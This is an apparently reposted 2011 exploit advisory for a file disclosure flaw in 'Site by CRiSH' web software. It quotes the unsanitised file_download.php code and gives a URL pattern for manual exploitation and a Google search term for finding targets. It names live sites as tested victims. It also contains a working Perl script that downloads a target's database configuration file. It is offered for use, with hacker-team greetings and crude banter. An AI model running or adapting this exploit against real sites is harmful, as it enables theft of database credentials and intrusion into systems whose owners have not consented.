Site By CRiSH File Disclosure

2011-05-12 / 2011-05-13
Credit: KnocKout
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : 1337day.com 0 1 [+] Support e-mail : submit[at]1337day.com 1 0 0 1 ######################################### 1 0 I'm KnocKout member from Inj3ct0r Team 1 1 ######################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 ~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [~] Live Contact : knockoutr@msn.com [~] E-Mail : knockout@e-mail.com.tr [~] HomePage : http://h4x0resec.blogspot.com - http://1337day.com - http://09EXPLOIT.COM / HTTP://0NTO.ME / HTTP://GRIADAMLAR.COM -------------------------------------------------------- ~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~ |~Web App. : Site by CRiSH |~Price : N/A |~Version : N/A |~Software: http://www.iware.com.tw/ |~Vulnerability Style : Ynformation disclosure |~Vulnerability Dir : / |~Google Keyword : "Site by CRiSH" |[~]Date : "10.05.2011" |[~]Tested on : http://trendxmarketing.com/ www.kuwaitembassy.net http://dxnmagnumlanka.com/ http://sambuddhatvajayanthi.com// ---------------------------------------------------------- file_download.php <= 'file' Functions Not Security AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AA Vulnerable ON file_download.php Lines.. <? .. @$download_file = $_REQUEST['file']; $download = @fopen("".$_REQUEST['file'],"r"); if(!$download) die('error in openinig file'); $file = basename($_REQUEST['file']); .. ?> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA --------------------------------------------------------- Manual Exploitation| http://Target/file_download.php?file={ Disclosure File } Ex: http://trendxmarketing.com/file_down...lass.mysql.php Exploit Scsfly! ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Automatic Information Disclosure Exploit. =============== KO.PL ================================================= use LWP::Simple; use LWP::UserAgent; system('cls'); system('title Site by CRiSH <= Remote class.mysql.php Disclosure Exploit'); system('color 2'); if(@ARGV < 2) { print "[-]Su Sekilde Kocum. \n\n"; &help; exit(); } sub help() { print "[+] usage1 : perl $0 HedefWeb /path/ \n"; print "[+] usage2 : perl $0 localhost / \n"; } print "\n*********************************************** *************************\n"; print "\* Plinka Design <= Remote (File Disclosure/LFI) Exploit *\n"; print "\* Exploited By : KnocKout *\n"; print "\* Contact : knockoutr[at]msn[dot]com *\n"; print "\* -- *\n"; print "\************************************************ *********************\n\n\n"; ($TargetIP, $path, $File,) = @ARGV; $File="file_download.php?file=lib/class.mysql.php"; my $url = "http://" . $TargetIP . $path . $File; print "\n Az Bekle Sikertiyorum!!! \n\n"; my $useragent = LWP::UserAgent->new(); my $request = $useragent->get($url,":content_file" => "index.php"); if ($request->is_success) { print "[+] $url <= Hedef Site Exploit Edildi!\n\n"; print "[+] OPERASYON TAMAM !\n"; print "[+] Index.php Dosyasi Indirildi (class.mysql.php)\n"; print "[+] GRAYHATZ STAR \n"; print "[+] Special tnX # + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com) # Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * eidelweiss * SeeMe * XroGuE * agix * KedAns-Dz # gunslinger_ * Sn!pEr.S!Te * ZoRLu * anT!-Tr0J4n 'www.1337day.com/team' ++ .... \n"; exit(); } else { print "[!] Exploit $url Basarisiz !\n[!] ".$request->status_line."\n"; exit(); } ================================================== ============== Exploit-DB iin Bir Hediyem var. ............../'' ) ...........,/&#175;../ ........../..../ .../&#175;/'...'/&#175;&#175;`&#65533; ./'/.../..../......./&#175; \ ('(.......... &#175;~/'...' ) .\.................'..... / Mucxx Bitches.. ..'\'...\.......... _.&#65533; ....\..............( .....\........ # + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com) # Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * eidelweiss * SeeMe * XroGuE * agix * KedAns-Dz # gunslinger_ * Sn!pEr.S!Te * ZoRLu * anT!-Tr0J4n 'www.1337day.com/team' ++ ....


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top